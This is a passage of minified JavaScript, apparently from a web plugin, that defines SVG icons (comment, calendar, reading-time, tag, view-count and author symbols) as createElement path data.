5.6 1.9 8.6 1.9 1 0 1.9-.1 2.8-.2l9.1 5.1v-8.8c4.2-3.1 6.6-7.7 6.6-12.7 0-9-8.3-16.4-18.5-16.4zM12 30.4l-.5-.1-3.8 2.1v-3.6l-.6-.4c-2.7-1.9-4.3-4.6-4.3-7.6 0-5.1 4.5-9.3 10.3-9.7-.7 1.7-1 3.5-1 5.4 0 5.1 2.7 9.9 7.1 13-2.2 1-4.5 1.3-7.2.9zm28.4-3.1-.6.4v5.4L34 29.9l-.5.1c-.9.2-1.8.2-2.8.2-2.8 0-5.6-.7-8.1-1.9-4.8-2.5-7.7-6.9-7.7-11.8 0-2.1.6-4.2 1.6-6.1 2.7-4.7 8.1-7.6 14.1-7.6 8.7 0 15.7 6.1 15.7 13.7.1 4.3-2.1 8.2-5.9 10.8z"})),comment:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 19 19"},(0,o.createElement)("path",{d:"M9.43016863,13.2235931 C9.58624731,13.094699 9.7823475,13.0241935 9.98476849,13.0241935 L15.0564516,13.0241935 C15.8581553,13.0241935 16.5080645,12.3742843 16.5080645,11.5725806 L16.5080645,3.44354839 C16.5080645,2.64184472 15.8581553,1.99193548 15.0564516,1.99193548 L3.44354839,1.99193548 C2.64184472,1.99193548 1.99193548,2.64184472 1.99193548,3.44354839 L1.99193548,11.5725806 C1.99193548,12.3742843 2.64184472,13.0241935 3.44354839,13.0241935 L5.76612903,13.0241935 C6.24715123,13.0241935 6.63709677,13.4141391 6.63709677,13.8951613 L6.63709677,15.5301903 L9.43016863,13.2235931 Z M3.44354839,14.766129 C1.67980032,14.766129 0.25,13.3363287 0.25,11.5725806 L0.25,3.44354839 C0.25,1.67980032 1.67980032,0.25 3.44354839,0.25 L15.0564516,0.25 C16.8201997,0.25 18.25,1.67980032 18.25,3.44354839 L18.25,11.5725806 C18.25,13.3363287 16.8201997,14.766129 15.0564516,14.766129 L10.2979143,14.766129 L6.32072889,18.0506004 C5.75274472,18.5196577 4.89516129,18.1156602 4.89516129,17.3790323 L4.89516129,14.766129 L3.44354839,14.766129 Z"})),date1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 94.9 88.7"},(0,o.createElement)("path",{d:"M84.5 7.9H71.8V3.2c0-1.8-1.5-3.2-3.2-3.2s-3.2 1.5-3.2 3.2v4.7H50.7V3.2c0-1.8-1.5-3.2-3.2-3.2-1.8 0-3.2 1.5-3.2 3.2v4.7H29.6V3.2c0-1.8-1.5-3.2-3.2-3.2s-3.2 1.5-3.2 3.2v4.7H10.4C4.7 7.9 0 12.6 0 18.3v60C0 84 4.7 88.7 10.4 88.7h74.1c5.7 0 10.4-4.7 10.4-10.4v-60c0-5.7-4.7-10.4-10.4-10.4zm3.9 70.4c0 2.1-1.7 3.9-3.9 3.9H10.4c-2.1 0-3.9-1.7-3.9-3.9v-60c0-2.1 1.7-3.9 3.9-3.9h12.8V20c0 1.8 1.5 3.2 3.2 3.2s3.2-1.5 3.2-3.2v-5.6h14.6V20c0 1.8 1.5 3.2 3.2 3.2 1.8 0 3.2-1.5 3.2-3.2v-5.6h14.6V20c0 1.8 1.5 3.2 3.2 3.2s3.2-1.5 3.2-3.2v-5.6h12.8c2.1 0 3.9 1.7 3.9 3.9v60z"}),(0,o.createElement)("circle",{cx:"26.4",cy:"36.8",r:"3.6"}),(0,o.createElement)("path",{d:"M47.4 33.2c-2 0-3.6 1.6-3.6 3.6s1.6 3.6 3.6 3.6 3.6-1.6 3.6-3.6-1.6-3.6-3.6-3.6z"}),(0,o.createElement)("circle",{cx:"68.5",cy:"36.8",r:"3.6"}),(0,o.createElement)("circle",{cx:"26.4",cy:"51.9",r:"3.6"}),(0,o.createElement)("path",{d:"M47.4 48.3c-2 0-3.6 1.6-3.6 3.6s1.6 3.6 3.6 3.6 3.6-1.6 3.6-3.6-1.6-3.6-3.6-3.6z"}),(0,o.createElement)("circle",{cx:"68.5",cy:"51.9",r:"3.6"}),(0,o.createElement)("circle",{cx:"26.4",cy:"67",r:"3.6"}),(0,o.createElement)("path",{d:"M47.4 63.4c-2 0-3.6 1.6-3.6 3.6s1.6 3.6 3.6 3.6S51 69 51 67s-1.6-3.6-3.6-3.6z"}),(0,o.createElement)("circle",{cx:"68.5",cy:"67",r:"3.6"})),date2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 94.9 89.8"},(0,o.createElement)("path",{d:"M85.2 8.9H73.6V3.2c0-1.8-1.4-3.2-3.2-3.2-1.8 0-3.2 1.4-3.2 3.2v5.7H27.7V3.2c0-1.8-1.4-3.2-3.2-3.2s-3.2 1.4-3.2 3.2v5.7H9.7C4.3 8.9 0 13.3 0 18.6V80c0 5.4 4.3 9.7 9.7 9.7h75.5c5.4 0 9.7-4.4 9.7-9.7V18.6c0-5.3-4.4-9.7-9.7-9.7zm0 74.5H9.7c-1.8 0-3.3-1.5-3.3-3.3V30.4h82.1V80c0 1.9-1.5 3.4-3.3 3.4z"}),(0,o.createElement)("path",{d:"M16 40.4h8.5v8.5H16zM43.2 40.4h8.5v8.5h-8.5zM70.4 40.4h8.5v8.5h-8.5zM16 65.1h8.5v8.5H16zM43.2 65.1h8.5v8.5h-8.5zM70.4 65.1h8.5v8.5h-8.5z"})),date3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 92.8 84"},(0,o.createElement)("path",{d:"M87.2 6.7h-5.9V2.4c0-1.3-1.1-2.4-2.4-2.4-1.3 0-2.4 1.1-2.4 2.4v4.3H64.1V2.4C64.1 1.1 63 0 61.6 0s-2.4 1.1-2.4 2.4v4.3H46.8V2.4c0-1.3-1.1-2.4-2.4-2.4S42 1.1 42 2.4v4.3h-6c-2.7 0-5.3 1.5-6.7 3.9l-28 48.9C-.2 62.2-.4 64.8.9 67c1.3 2.3 4.1 3.6 7.7 3.6h21.9v1.5c0 2.5.8 4.9 2.2 6.9 2.2 3.1 5.8 5 9.7 5H81c6.5 0 11.8-5.3 11.8-11.8V12.3c0-3-2.5-5.6-5.6-5.6zM5.1 64.6c-.4-.6-.2-1.5.4-2.6l28-48.9c.5-.9 1.4-1.4 2.4-1.4h49c.3 0 .5.2.6.3.1.2.2.4 0 .7L58.7 59.6c-1.9 3.4-7.2 6.2-11.6 6.2H8.5c-1.7 0-3-.5-3.4-1.2zM81 79.1H42.3c-2.3 0-4.4-1.1-5.7-2.9-.8-1.2-1.3-2.6-1.3-4v-1.5h11.8c6.1 0 13-3.8 15.8-8.7l25-43.6v53.8c0 3.8-3.1 6.9-6.9 6.9z"}),(0,o.createElement)("path",{d:"M41.8 23.8h-6.7l-3 5.3h6.7zM56.6 23.8H50l-3.1 5.3h6.7zM71.4 23.8h-6.6l-3 5.3h6.6zM28.1 36.1l-3 5.3h6.6l3-5.3zM46.5 41.4l3.1-5.3h-6.7l-3 5.3zM61.4 41.4l3-5.3h-6.7l-3 5.3zM18 53.7h6.7l3-5.3H21zM42.5 48.4h-6.6l-3.1 5.3h6.7zM47.7 53.7h6.6l3.1-5.3h-6.7z"})),date4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 84.8 84"},(0,o.createElement)("path",{d:"M74.7 12.2h-9V4.4c0-2.4-2-4.4-4.4-4.4-2.4 0-4.4 2-4.4 4.4v7.8h-29V4.4c0-2.4-2-4.4-4.4-4.4C21 0 19 2 19 4.4v7.8h-9c-5.5 0-10 4.5-10 10.1v7.2h84.8v-7.2c0-5.6-4.5-10.1-10.1-10.1zM0 74c0 5.5 4.5 10 10.1 10h64.7c5.6 0 10-4.5 10-10.1V38.4H0V74z"})),date5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 84.8 79.3"},(0,o.createElement)("path",{d:"M75.6 7.1H64.1V2.9c0-1.6-1.3-2.9-2.9-2.9-1.6 0-2.9 1.3-2.9 2.9v4.2H26.4V2.9c0-1.6-1.3-2.9-2.9-2.9s-2.9 1.3-2.9 2.9v4.2H9.2C4.1 7.1 0 11.2 0 16.2v53.9c0 5.1 4.1 9.2 9.2 9.2h66.4c5.1 0 9.2-4.1 9.2-9.2V16.2c0-5-4.1-9.1-9.2-9.1zM9.2 12.8h11.5v5c0 1.6 1.3 2.9 2.9 2.9s2.9-1.3 2.9-2.9v-5h31.9v5c0 1.6 1.3 2.9 2.9 2.9 1.6 0 2.9-1.3 2.9-2.9v-5h11.5c1.9 0 3.4 1.5 3.4 3.4v9.5H5.7v-9.5c0-1.8 1.6-3.4 3.5-3.4zm66.4 60.7H9.2c-1.9 0-3.4-1.5-3.4-3.4V31.5h73.3v38.6c0 1.9-1.6 3.4-3.5 3.4z"})),calendar:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18 19"},(0,o.createElement)("path",{d:"M4.60069444,4.09375 L3.25,4.09375 C2.47334957,4.09375 1.84375,4.72334957 1.84375,5.5 L1.84375,7.26736111 L16.15625,7.26736111 L16.15625,5.5 C16.15625,4.72334957 15.5266504,4.09375 14.75,4.09375 L13.3993056,4.09375 L13.3993056,4.55555556 C13.3993056,5.02154581 13.0215458,5.39930556 12.5555556,5.39930556 C12.0895653,5.39930556 11.7118056,5.02154581 11.7118056,4.55555556 L11.7118056,4.09375 L6.28819444,4.09375 L6.28819444,4.55555556 C6.28819444,5.02154581 5.9104347,5.39930556 5.44444444,5.39930556 C4.97845419,5.39930556 4.60069444,5.02154581 4.60069444,4.55555556 L4.60069444,4.09375 Z M6.28819444,2.40625 L11.7118056,2.40625 L11.7118056,1 C11.7118056,0.534009742 12.0895653,0.15625 12.5555556,0.15625 C13.0215458,0.15625 13.3993056,0.534009742 13.3993056,1 L13.3993056,2.40625 L14.75,2.40625 C16.4586309,2.40625 17.84375,3.79136906 17.84375,5.5 L17.84375,15.875 C17.84375,17.5836309 16.4586309,18.96875 14.75,18.96875 L3.25,18.96875 C1.54136906,18.96875 0.15625,17.5836309 0.15625,15.875 L0.15625,5.5 C0.15625,3.79136906 1.54136906,2.40625 3.25,2.40625 L4.60069444,2.40625 L4.60069444,1 C4.60069444,0.534009742 4.97845419,0.15625 5.44444444,0.15625 C5.9104347,0.15625 6.28819444,0.534009742 6.28819444,1 L6.28819444,2.40625 Z M1.84375,8.95486111 L1.84375,15.875 C1.84375,16.6516504 2.47334957,17.28125 3.25,17.28125 L14.75,17.28125 C15.5266504,17.28125 16.15625,16.6516504 16.15625,15.875 L16.15625,8.95486111 L1.84375,8.95486111 Z"})),readingTime1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 33.7 33.6"},(0,o.createElement)("path",{d:"M4.8 22.3h12.1v2H4.8zM4.8 27.2h9.7v2H4.8z"}),(0,o.createElement)("path",{d:"M33.7 11.3C33.7 5.1 28.6 0 22.4 0c-6.2 0-11.3 5.1-11.3 11.3 0 1.2.2 2.4.6 3.6H9.4C4.2 14.9 0 19 0 24.2v9.4h17.9c2.5 0 4.8-1 6.6-2.7 1.8-1.8 2.7-4.1 2.7-6.6 0-.9-.1-1.7-.4-2.6 4.1-1.8 6.9-5.8 6.9-10.4zm-8.4 12.9c0 2-.8 3.8-2.2 5.2-1.4 1.4-3.2 2.2-5.2 2.2H2v-7.4c0-4.1 3.3-7.4 7.4-7.4h3.2c1.9 3.4 5.6 5.7 9.8 5.7.9 0 1.8-.1 2.6-.3.2.7.3 1.3.3 2zm-2.9-3.6c-5.1 0-9.3-4.2-9.3-9.3S17.3 2 22.4 2s9.3 4.2 9.3 9.3-4.2 9.3-9.3 9.3z"}),(0,o.createElement)("path",{d:"M23.4 5.8h-2v5.9l3.9 3.9 1.4-1.4-3.3-3.3z"})),readingTime2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 33.7 33.7"},(0,o.createElement)("path",{d:"M16.8 0C7.6 0 0 7.6 0 16.8c0 9.3 7.6 16.8 16.8 16.8 9.3 0 16.8-7.6 16.8-16.8C33.7 7.6 26.1 0 16.8 0zM18 31.4v-2.3h-2.2v2.3C8.6 30.8 2.9 25.1 2.3 18h2.3v-2.2H2.3C2.9 8.6 8.6 2.9 15.7 2.3v2.3H18V2.3c7.2.5 12.9 6.3 13.4 13.4h-2.3V18h2.3c-.6 7.1-6.3 12.8-13.4 13.4z"}),(0,o.createElement)("path",{d:"M18 7.7h-2.3v9.6l6 6 1.6-1.6-5.3-5.3z"})),readingTime3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.5 31.3"},(0,o.createElement)("path",{d:"M22 17.9c-.4 0-.8.3-.8.8v4.9H5.3V7.2h4.5c.4 0 .8-.3.8-.8s-.3-.8-.8-.8h-6C1.7 5.7 0 7.4 0 9.6v17.9c0 1 .4 2 1.1 2.7.7.7 1.7 1.1 2.7 1.1H22c.4 0 .8-.3.8-.8s-.3-.8-.8-.8H3.8c-.6 0-1.2-.2-1.7-.7-.4-.4-.7-1-.7-1.7 0-.6.2-1.2.7-1.7.4-.4 1-.7 1.7-.7h18.8v-6.4c.1-.2-.2-.6-.6-.6zM1.5 24.4V9.6c0-1.3 1-2.3 2.3-2.3v16.4c-.8-.1-1.6.2-2.3.7z"}),(0,o.createElement)("path",{d:"M3.6 26.7c-.4 0-.8.3-.8.8s.3.8.8.8H22c.4 0 .8-.3.8-.8s-.3-.8-.8-.8H3.6zM19.9 0c-4.8 0-8.7 3.9-8.7 8.7s3.9 8.7 8.7 8.7 8.7-3.9 8.7-8.7-4-8.7-8.7-8.7zm0 15.9c-4 0-7.2-3.2-7.2-7.2s3.2-7.2 7.2-7.2S27 4.7 27 8.7s-3.2 7.2-7.1 7.2z"}),(0,o.createElement)("path",{d:"M20.6 8.4V3.8c0-.4-.3-.8-.8-.8s-.8.3-.8.8V9l3.6 3.6c.1.1.3.2.5.2s.4-.1.5-.2c.3-.3.3-.8 0-1.1l-3-3.1z"})),readingTime4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 30 30"},(0,o.createElement)("path",{d:"M15 0C6.7 0 0 6.7 0 15s6.7 15 15 15 15-6.7 15-15S23.3 0 15 0zm0 27.5C8.1 27.5 2.5 21.9 2.5 15S8.1 2.5 15 2.5 27.5 8.1 27.5 15 21.9 27.5 15 27.5z"}),(0,o.createElement)("path",{d:"M16.2 14.5V8.4c0-.7-.6-1.2-1.2-1.2s-1.2.6-1.2 1.2v7.1l4.9 4.9c.2.2.6.4.9.4s.6-.1.9-.4c.5-.5.5-1.3 0-1.8l-4.3-4.1z"})),readingTime5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18.1 30"},(0,o.createElement)("path",{d:"M12.1 15.9c-.3-.6-.3-1.3 0-1.8l5.6-9.7c.5-.9.5-2 0-2.9-.5-1-1.5-1.5-2.5-1.5H2.9C1.8 0 .9.5.4 1.5c-.5.9-.5 2 0 2.9L6 14.1c.3.6.3 1.3 0 1.8L.4 25.6c-.5.9-.5 2 0 2.9.5.9 1.5 1.5 2.5 1.5h12.2c1.1 0 2-.5 2.5-1.5.5-.9.5-2 0-2.9l-5.5-9.7zM16.7 28c-.3.6-.9.9-1.6.9H2.9c-.7 0-1.3-.3-1.6-.9-.3-.6-.3-1.3 0-1.8l5.6-9.7c.5-.9.5-2 0-2.9L1.4 3.9C1 3.3 1 2.6 1.4 2c.3-.6.9-.9 1.6-.9h12.2c.7 0 1.3.3 1.6.9s.3 1.3 0 1.8l-5.6 9.7c-.5.9-.5 2 0 2.9l5.6 9.7c.3.6.3 1.3-.1 1.9z"}),(0,o.createElement)("path",{d:"M15 25.2c-.3-.5-.8-.8-1.4-.8h-3.1c-.4 0-.8-.3-.8-.8V15c0-.7.2-1.4.5-2l2.5-4.4c.3-.5-.1-1.1-.7-1.1H6c-.6 0-.9.6-.7 1.1L7.9 13c.4.6.5 1.3.5 2v8.7c0 .4-.3.8-.8.8h-3c-.6 0-1.1.3-1.4.8l-.8 1.5c-.2.3-.1.6 0 .7.1.1.3.4.6.4h12.2c.4 0 .6-.2.6-.4.1-.1.2-.4 0-.7l-.8-1.6z"})),tag1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36.053 50"},(0,o.createElement)("path",{d:"M394.89,173.425H365.409a3.29,3.29,0,0,0-3.286,3.286v44.321a2.4,2.4,0,0,0,2.4,2.393,2.358,2.358,0,0,0,1.46-.508l13.46-10.5a1.172,1.172,0,0,1,1.417,0l13.462,10.5a2.358,2.358,0,0,0,1.46.508,2.4,2.4,0,0,0,2.4-2.393V176.711A3.29,3.29,0,0,0,394.89,173.425Zm-.5,3.783v40.968l-11.208-8.739a4.937,4.937,0,0,0-6.07,0l-11.207,8.739V177.208Z",transform:"translate(-362.123 -173.425)"})),tag2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("g",{transform:"translate(-415.893 -173.425)"},(0,o.createElement)("path",{d:"M465.893,195.139l-.055-17.262a4.407,4.407,0,0,0-4.4-4.4l-17.262-.054a4.4,4.4,0,0,0-3.135,1.29l-23.858,23.858a4.411,4.411,0,0,0,0,6.239l17.32,17.32a4.413,4.413,0,0,0,6.24,0L464.6,198.275A4.406,4.406,0,0,0,465.893,195.139Zm-13.915-7.8a4.908,4.908,0,1,1,6.945,0A4.908,4.908,0,0,1,451.978,187.336Z"}))),tag3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.996 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M21.897 50a5.435 5.435 0 0 1-3.87-1.6L1.6 31.976a5.48 5.48 0 0 1 0-7.741L24.227 1.607a5.5 5.5 0 0 1 3.864-1.6h.029l16.369.052a5.483 5.483 0 0 1 5.456 5.457l.051 16.368a5.5 5.5 0 0 1-1.6 3.893L25.768 48.404A5.435 5.435 0 0 1 21.897 50Zm6.2-47.422a2.906 2.906 0 0 0-2.043.847L3.42 26.052a2.895 2.895 0 0 0 0 4.1l16.429 16.424a2.9 2.9 0 0 0 4.1 0l22.627-22.627a2.9 2.9 0 0 0 .847-2.055l-.052-16.372a2.9 2.9 0 0 0-2.885-2.886l-16.377-.06Zm10.711 14.559a5.911 5.911 0 0 1-4.205-1.742 5.945 5.945 0 1 1 4.205 1.742Zm0-9.31a3.366 3.366 0 0 0-2.388 5.749 3.366 3.366 0 1 0 2.382-5.745Z"}))),tag4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.945 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m41.499 29.13 3.459-12.847a4.647 4.647 0 0 0-1.2-4.48l-.695-.694-3.78 3.78a4.693 4.693 0 1 1-4.167-4.168l3.78-3.779-.691-.692a4.633 4.633 0 0 0-4.48-1.2L20.869 8.501a4.73 4.73 0 0 0-2.075 1.2L1.353 27.146a4.629 4.629 0 0 0 .008 6.547l14.955 14.955a4.629 4.629 0 0 0 6.539 0l17.441-17.439a4.6 4.6 0 0 0 1.203-2.079ZM22.064 40.809 9.192 27.937l1.647-1.647 12.872 12.872Zm5.2-5.2L14.392 22.738l1.647-1.647 12.872 12.871Z"}),(0,o.createElement)("path",{d:"M38.587 3.298a1.01 1.01 0 0 0 1.429 0l.734-.734a1.86 1.86 0 0 1 2.631 2.631l-9.486 9.486a1.01 1.01 0 0 0 1.429 1.428l9.486-9.486a3.881 3.881 0 0 0-5.489-5.489l-.734.734a1.012 1.012 0 0 0 0 1.43Z"}))),tag5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50.003 50"},(0,o.createElement)("g",null,(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m46.162 27.099 3.633-13.513a6.171 6.171 0 0 0-1.591-5.943l-.775-.776-1.8 1.8.776.776a3.612 3.612 0 0 1 .929 3.478l-3.631 13.51a3.631 3.631 0 0 1-.933 1.614L24.42 46.394a3.6 3.6 0 0 1-5.087 0L3.606 30.666a3.6 3.6 0 0 1 0-5.087L21.951 7.238a3.617 3.617 0 0 1 1.612-.933l13.513-3.628a3.61 3.61 0 0 1 3.48.929l.772.773 1.8-1.8-.772-.773a6.172 6.172 0 0 0-5.944-1.59l-13.517 3.63a6.179 6.179 0 0 0-2.752 1.592L1.798 23.779a6.156 6.156 0 0 0 0 8.7l15.73 15.723a6.156 6.156 0 0 0 8.7 0l18.35-18.349a6.183 6.183 0 0 0 1.584-2.754Z"}),(0,o.createElement)("path",{d:"M31.065 10.164a6.2 6.2 0 1 0 9.578 1l8.52-8.52-1.8-1.8-8.52 8.519a6.211 6.211 0 0 0-7.778.801Zm6.967 6.967a3.651 3.651 0 1 1 0-5.163 3.656 3.656 0 0 1-.004 5.163Z"})),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m17.406 21.542 1.414-1.414 11.052 11.051-1.415 1.414z"})),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m12.949 25.999 1.414-1.414 11.052 11.051L24 37.05z"})))),tag6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m32.767 49.613-13.8-10.761a1.818 1.818 0 0 0-2.233 0l-13.8 10.761a1.815 1.815 0 0 1-2.931-1.431V2.736A2.736 2.736 0 0 1 2.739 0h30.227a2.736 2.736 0 0 1 2.736 2.736v45.446a1.815 1.815 0 0 1-2.935 1.431Z"}))),viewCount1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100.4 63.9"},(0,o.createElement)("path",{d:"M99.7 30.7C90.3 11.8 71.3 0 50.2 0S10.1 11.8.6 30.7L0 31.9l.6 1.3C10 52.1 29 63.9 50.2 63.9s40.1-11.8 49.6-30.7l.6-1.3-.7-1.2zm-43-19.5c5.2 0 9.4 4.2 9.4 9.4S61.9 30 56.7 30s-9.4-4.2-9.4-9.4 4.2-9.4 9.4-9.4zm-6.5 47c-18.5 0-35.1-10-43.8-26.3C12.9 19.7 23.9 11 36.9 7.5c-5 3.9-8.2 10-8.2 16.9 0 11.9 9.6 21.5 21.5 21.5s21.5-9.6 21.5-21.5c0-6.8-3.2-12.9-8.2-16.9 13 3.6 24 12.3 30.5 24.4-8.7 16.3-25.3 26.3-43.8 26.3z"})),viewCount2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 63.7"},(0,o.createElement)("path",{d:"M99.4 30.6C90 11.7 71.1 0 50 0S10 11.7.6 30.6L0 31.8l.6 1.3C10 52 29 63.7 50 63.7S90 52 99.4 33.1l.6-1.3-.6-1.2zM50 58C31.6 58 15 48 6.4 31.8 15 15.7 31.6 5.7 50 5.7s35 10 43.6 26.1C85 48 68.4 58 50 58z"}),(0,o.createElement)("path",{d:"M50 12c-10.9 0-19.8 8.9-19.8 19.8S39.1 51.6 50 51.6s19.8-8.9 19.8-19.8S61 12 50 12zm0 34c-7.8 0-14.2-6.3-14.2-14.2S42.2 17.7 50 17.7 64.2 24 64.2 31.8 57.8 46 50 46z"})),viewCount3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 53.5"},(0,o.createElement)("path",{d:"M98.9 25.1C87.6 9.4 69.4 0 50 0 30.7 0 12.4 9.4 1.2 25.1L0 26.7l1.2 1.6C12.4 44.1 30.7 53.5 50 53.5c19.3 0 37.6-9.4 48.8-25.1l1.2-1.6-1.1-1.7zm-27.8 1.6c0 11.6-9.5 21.1-21.1 21.1-11.6 0-21.1-9.5-21.1-21.1 0-11.6 9.5-21.1 21.1-21.1 11.7.1 21.1 9.5 21.1 21.1zM7 26.7c5.9-7.6 13.7-13.4 22.4-17-3.8 4.6-6.1 10.6-6.1 17 0 6.5 2.3 12.4 6.1 17-8.7-3.5-16.5-9.3-22.4-17zm63.6 17.1c3.8-4.6 6.1-10.6 6.1-17 0-6.5-2.3-12.4-6.1-17 8.7 3.6 16.5 9.4 22.4 17-5.8 7.6-13.6 13.4-22.4 17z"})),viewCount4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 90.5 76.9"},(0,o.createElement)("path",{d:"M60.7 43.2c-6.2 0-11.2-5-11.2-11.2 0-5.4 3.8-9.9 8.9-11-4-2-8.4-3.1-13.1-3.1-16.3 0-29.5 13.2-29.5 29.6C15.8 63.8 29 77 45.3 77s29.6-13.2 29.6-29.5c0-4.7-1.1-9.2-3.1-13.1-1.2 4.9-5.7 8.8-11.1 8.8z"}),(0,o.createElement)("path",{d:"M45.2 0C24.3 0 6.2 13.4 0 33.2L5.9 35C11.2 17.8 27.1 6.2 45.2 6.2c18.2 0 34 11.6 39.3 28.9l5.9-1.8C84.3 13.4 66.1 0 45.2 0z"})),viewCount5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 90.5 56"},(0,o.createElement)("path",{d:"M45.2 0C25.4 0 8.3 11.4 0 28c8.3 16.6 25.4 28 45.2 28 19.8 0 37-11.4 45.3-28C82.2 11.4 65 0 45.2 0zm0 48.7c-11.4 0-20.7-9.3-20.7-20.7 0-11.5 9.3-20.7 20.7-20.7 11.5 0 20.7 9.3 20.7 20.7 0 11.4-9.2 20.7-20.7 20.7z"}),(0,o.createElement)("path",{d:"M45.2 15.2c-7.1 0-12.8 5.7-12.8 12.8 0 7 5.7 12.8 12.8 12.8 7 0 12.8-5.7 12.8-12.8H45.2V15.2z"})),viewCount6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42.5 37.4"},(0,o.createElement)("path",{d:"M40.8 1.9C40.6.5 39.2-.4 37.9.1L24.9 5c-1.7.6-1.9 3-.4 3.9l5.6 3.4-6 9.9c-.5.9-1.7 1.2-2.6.6l-5.8-3.5c-1.2-.8-2.7-1-4.1-.6-1.4.3-2.6 1.2-3.3 2.5l-8 13.5c-.5.8-.2 1.9.6 2.4.3.2.6.3.9.3.6 0 1.2-.3 1.5-.8L11.4 23c.3-.4.7-.7 1.2-.9.5-.1 1 0 1.4.2l5.8 3.5c2.6 1.5 5.9.7 7.4-1.8l6-9.9 6 3.6c1.6.9 3.5-.3 3.3-2.1L40.8 1.9z"})),author1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.8 37.6"},(0,o.createElement)("path",{d:"M16.4 19.9C7.4 19.9 0 27.3 0 36.3v1.3h32.8v-1.3c0-9-7.3-16.4-16.4-16.4zM2.7 35c.7-7 6.6-12.5 13.8-12.5S29.5 28 30.2 35H2.7zM16.4 17.7c4.9 0 8.9-4 8.9-8.9S21.3 0 16.4 0 7.6 4 7.6 8.9s3.9 8.8 8.8 8.8zm0-15.1c3.5 0 6.3 2.8 6.3 6.3s-2.8 6.3-6.3 6.3-6.3-2.8-6.3-6.3 2.9-6.3 6.3-6.3z"})),author2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.1 36.6"},(0,o.createElement)("path",{d:"M14 16.8c-7.8 0-14 6.3-14 14 0 3.9 7 5.8 14 5.8s14-1.9 14-5.8c.1-7.7-6.2-14-14-14zm0 17.3c-7.5 0-11.6-2.2-11.6-3.3 0-6.4 5.2-11.6 11.6-11.6 6.4 0 11.6 5.2 11.6 11.6 0 1.2-4.1 3.3-11.6 3.3zM9 14.5h2.6c-1.8-1-3.1-3.1-3.1-5.5 0-.5 0-.9.1-1.4.1-.6.5-1.1 1.1-1.4l1.7-1c.6-.3 1.3-.4 1.9-.2l4.9 1.7c.9.3 1.5 1.1 1.5 2V9c0 2.4-1.3 4.5-3.1 5.5h2.5c1.2 0 2.2-1 2.2-2.2v-5c0-4.3-3.8-7.8-8.2-7.2-3.7.4-6.3 3.7-6.3 7.4v4.8c0 1.2 1 2.2 2.2 2.2z"})),author3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 27.8 29.5"},(0,o.createElement)("path",{d:"M27.7 26.7c-1.3-6.5-7-11.3-13.8-11.3S1.3 20.3 0 26.7c-.3 1.4.9 2.8 2.3 2.8h23c1.6 0 2.7-1.3 2.4-2.8z"}),(0,o.createElement)("circle",{cx:"13.9",cy:"6.4",r:"6.4"})),author4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 27.3 27.6"},(0,o.createElement)("path",{d:"M13.6 13.1c3.6 0 6.6-2.9 6.6-6.6 0-3.6-2.9-6.6-6.6-6.6H7.1v6.6c0 3.7 2.9 6.6 6.5 6.6zM9.1 2h4.6c2.5 0 4.6 2 4.6 4.6s-2 4.6-4.6 4.6-4.6-2-4.6-4.6V2zM13.6 14C6.1 14 0 20.1 0 27.6h2C2 21.2 7.2 16 13.6 16c6.4 0 11.6 5.2 11.6 11.6h2c.1-7.5-6-13.6-13.6-13.6z"})),author5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.8 26.6"},(0,o.createElement)("path",{d:"M28.8 23.7c-.7-3.5-2.6-6.5-5.3-8.6-1.5-1.2-3.6-1.5-5.5-.8-1.1.4-2.4.6-3.6.6-1.3 0-2.5-.2-3.6-.6-1.9-.6-3.9-.4-5.5.8C2.6 17.2.7 20.2.1 23.7c-.3 1.5.9 2.9 2.4 2.9h23.9c1.5 0 2.7-1.4 2.4-2.9z"}),(0,o.createElement)("circle",{transform:"rotate(-67.5 14.418 